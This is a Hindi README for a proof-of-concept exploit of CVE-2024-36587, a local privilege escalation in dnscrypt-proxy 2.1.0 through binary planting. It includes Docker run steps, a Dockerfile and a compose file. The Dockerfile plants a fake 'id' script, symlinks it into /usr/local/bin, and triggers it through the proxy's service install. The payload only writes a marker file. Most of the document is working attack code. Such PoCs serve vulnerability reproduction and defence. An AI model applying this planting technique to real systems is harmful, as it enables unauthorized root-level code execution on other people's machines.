
CVE-2024-36587 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो dnscrypt-proxy में बाइनरी प्लांटिंग के माध्यम से स्थानीय विशेषाधिकार वृद्धि को प्रदर्शित करता है, साथ ही Docker-आधारित पुनरुत्पादन वातावरण।
docker compose up --build
बिल्ड और निष्पादन पूरा होने पर कंटेनर बनाया जाता है।
कंटेनर के अंदर प्रवेश करें:
docker run -it --privileged dnscrypt-poc-poc bash
कंटेनर के अंदर:
/tmp/id
cat /tmp/poc_was_here
यदि Pwned_from_Docker आउटपुट होता है, तो PoC सफल।
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y \
git \
golang-go \
sudo
WORKDIR /workspace
RUN git clone https://github.com/DNSCrypt/dnscrypt-proxy.git && \
cd dnscrypt-proxy && \
git checkout tags/2.1.0 && \
go build -o proxy ./dnscrypt-proxy
RUN bash -c 'echo -e "#!/bin/bash\necho Pwned_from_Docker > /tmp/poc_was_here" > /tmp/id' && \
chmod +x /tmp/id && \
ln -sf /tmp/id /usr/local/bin/id
CMD ["./dnscrypt-proxy/proxy", "-service", "install"]
version: "3.8"
services:
poc:
build: .
container_name: dnscrypt-poc
privileged: true
tty: true

अधिक विस्तृत विश्लेषण और अभ्यास परिणामों के लिए निम्नलिखित PDF दस्तावेज़ देखें: